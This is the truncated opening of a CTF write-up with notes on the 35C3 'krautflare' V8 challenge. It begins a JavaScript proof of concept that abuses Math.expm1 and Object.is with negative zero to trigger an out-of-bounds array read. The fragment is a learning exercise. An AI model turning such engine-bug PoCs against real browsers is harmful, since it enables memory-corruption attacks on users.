0x00 Overview

These are some of my notes about the krautflare challenge in 35C3 CTF, and are not a complete write-up for this challenge. For a complete write-up, please read this and this. This is also a complete exploit. I will discuss some of the problems I encountered and how I solved them when I was working on this challenge.

PoC

Here is the working PoC that can trigger an OOB read.

    function f(v) {
        const arr = [1.1, 2.2, 3.3];
        const o = {z1: -0}
        let res = Object.is(Math.expm1(v), o.z1);
        return arr[re...